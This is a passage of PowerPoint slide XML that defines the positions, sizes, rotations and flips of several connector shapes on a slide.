            <a:ext cx="1143000" cy="18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2" name="Shape 10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975" y="3575050"/>
            <a:ext cx="1143000" cy="18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3" name="Shape 10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3950" y="3575050"/>
            <a:ext cx="1143000" cy="181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4" name="Shape 1094"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1089" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1468900" y="4664575"/>
            <a:ext cx="6054300" cy="9429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95" name="Shape 1095"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3136275" y="4505850"/>
            <a:ext cx="4356900" cy="10917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96" name="Shape 1096"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1089" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2272900" y="5607475"/>
            <a:ext cx="5250300" cy="4368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97" name="Shape 1097"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4128675" y="5617400"/>
            <a:ext cx="3364500" cy="6252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